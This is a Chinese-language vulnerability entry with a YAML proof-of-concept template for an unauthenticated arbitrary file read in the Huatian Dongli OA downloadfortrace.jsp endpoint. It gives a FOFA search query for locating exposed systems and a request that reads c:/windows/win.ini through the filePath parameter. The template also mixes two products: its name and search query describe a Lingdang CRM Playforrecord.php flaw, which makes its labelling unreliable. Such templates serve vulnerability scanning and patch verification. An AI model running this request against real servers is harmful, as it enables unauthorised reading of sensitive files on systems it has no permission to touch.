漏洞描述
华天动力OA downloadfortrace.jsp接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
fofa:body="crmcommon/js/jquery/jquery-1.10.1.min.js" || body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js" || title="灵当CRM"
huatiandongli-oa-downloadfortrace-fileread: 灵当CRM Playforrecord.php 任意文件读取漏洞
PoC代码[已公开]
id: huatiandongli-oa-downloadfortrace-fileread
info:
name: 灵当CRM Playforrecord.php 任意文件读取漏洞
author: avic123
severity: high
verified: true
description: |
华天动力OA downloadfortrace.jsp接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
fofa:body="crmcommon/js/jquery/jquery-1.10.1.min.js" || body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js" || title="灵当CRM"
reference:
- https://cloud.tencent.com/developer/article/2443505
tags: huatiandongli,oa,fileread
created: 2025/08/19
set:
hostname: request.url.host
rules:
r0:
request:
method: GET
path: /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp?filePath=c:/windows/win.ini
expression: >-
response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
expression: r0()